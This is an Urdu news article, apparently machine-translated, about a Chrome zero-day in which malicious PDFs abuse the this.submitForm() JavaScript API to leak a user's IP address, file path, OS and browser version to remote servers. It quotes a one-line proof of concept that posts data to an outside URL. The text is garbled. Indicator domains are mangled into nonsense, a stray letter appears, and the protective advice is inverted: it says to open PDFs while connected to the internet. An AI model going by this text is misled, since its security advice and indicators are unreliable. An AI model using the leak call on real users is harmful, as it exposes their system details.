استحصال کی نشاندہی کرنے والی خدمت ایج سپاٹ نے پی ڈی ایف دستاویزات کا استحصال کرتے ہوئے ایک دلچسپ کروم زیرو ڈے کا خطرہ دریافت کیا۔ کمزوری کے ذریعہ حملہ آوروں کو کروم میں کھولی گئی بدنصیبی پی ڈی ایف دستاویزات کا استعمال کرتے ہوئے حساس ڈیٹا کاٹنے کی اجازت ملتی ہے۔

جیسے ہی متاثرہ شخص نے گوگل کروم میں متعلقہ پی ڈی ایف فائلیں کھولیں ، بدنیتی پر مبنی پروگرام صارف کا ڈیٹا اکٹھا کرکے پس منظر میں کام کرنا شروع کردیتا ہے۔

اس کے بعد ڈیٹا کو ریموٹ سرور پر بھیج دیا جاتا ہے جسے ہیکرز کنٹرول کرتے ہیں۔ آپ سوچ رہے ہوں گے کہ حملہ آور کس ڈیٹا کو چوس رہے ہیں ، وہ آپ کے کمپیوٹر پر درج ذیل ڈیٹا کو نشانہ بناتے ہیں۔

• IP پتہ
• سسٹم پر پی ڈی ایف فائل کا مکمل راستہ
• OS اور Chrome ورژن

میلویئر سے متاثرہ پی ڈی ایف فائلوں سے بچو

آپ کو یہ جان کر حیرت ہوگی کہ جب ایڈوب ریڈر کو پی ڈی ایف فائلوں کو کھولنے کے لئے استعمال کیا جاتا ہے تو کچھ نہیں ہوتا ہے۔ اضافی طور پر ، HTTP POST درخواستوں کا استعمال کسی صارف کی مداخلت کے بغیر ریموٹ سرورز میں ڈیٹا کی منتقلی کے لئے کیا جاتا ہے۔

ماہرین نے دیکھا کہ دو ڈومینز میں سے ایک ریڈنوٹیفائک کام یا برپکولا بوراٹورنٹ ڈیٹا وصول کررہی ہے۔

آپ اس حقیقت پر غور کر کے حملے کی شدت کا تصور کرسکتے ہیں کہ بیشتر اینٹی وائرس سافٹ ویئر ایج سپاٹ کے ذریعہ پائے جانے والے نمونوں کا پتہ لگانے کے قابل نہیں ہے۔

ماہرین نے انکشاف کیا ہے کہ حملہ آور صارفین کی حساس معلومات اکٹھا کرنے کے لئے "this.submitForm ()" پی ڈی ایف جاوا اسکرپٹ API استعمال کر رہے ہیں۔

ہم نے اسے کم سے کم پی او سی کے ذریعے آزمایا ، ایک آسان API کال جیسے "this.submitForm ('http://google.com/test')" گوگل کروم کو گوگل ڈیٹا پر ذاتی ڈیٹا بھیجنے پر مجبور کرے گا۔

ماہرین کو دراصل پتہ چلا ہے کہ کروم بگ کو بدنصیب پی ڈی ایف فائلوں کے دو الگ الگ سیٹوں کے ذریعہ استحصال کیا جارہا ہے۔ ان دونوں کو بالترتیب اکتوبر 2017 اور ستمبر 2018 میں گردش کیا گیا تھا۔

خاص طور پر ، جمع کردہ ڈیٹا کو حملہ آور مستقبل میں حملوں کو ٹھیک کرنے کے لئے استعمال کرسکتے ہیں۔ اطلاعات سے پتہ چلتا ہے کہ فائلوں کا پہلا بیچ ReadNotify کی پی ڈی ایف ٹریکنگ سروس کا استعمال کرتے ہوئے مرتب کیا گیا تھا۔

صارف اس نظریہ کو صارف کے خیالات سے باخبر رکھنے کے لئے استعمال کرسکتے ہیں۔ ایج سپاٹ نے پی ڈی ایف فائلوں کے دوسرے سیٹ کی نوعیت کے حوالے سے کوئی تفصیلات شیئر نہیں کی ہیں۔

محفوظ رہنے کا طریقہ

استحصال کا پتہ لگانے کی خدمت ایج سپاٹ صارفین کروم صارفین کو ممکنہ خطرات سے آگاہ کرنا چاہتا تھا کیونکہ مستقبل قریب میں پیچ جاری ہونے کی امید نہیں ہے۔

ایج سپاٹ نے پچھلے سال گوگل کو اس خطرے سے دوچار ہونے کے بارے میں اطلاع دی اور کمپنی نے اپریل کے آخر میں ایک پیچ جاری کرنے کا وعدہ کیا۔ H

بہر حال ، آپ متبادل طور پر پی ڈی ایف ریڈر ایپ کا استعمال کرتے ہوئے موصولہ پی ڈی ایف دستاویزات کو مقامی طور پر ملاحظہ کرکے مسئلے کے لئے عارضی طور پر استعمال کرنے پر غور کرسکتے ہیں۔

متبادل کے طور پر ، آپ اپنے سسٹم کو انٹرنیٹ سے منسلک کرکے کروم میں اپنے پی ڈی ایف دستاویزات بھی کھول سکتے ہیں۔ دریں اثنا ، آپ کروم 74 اپ ڈیٹ کا انتظار کر سکتے ہیں جس کی توقع 23 اپریل کو ہو گی۔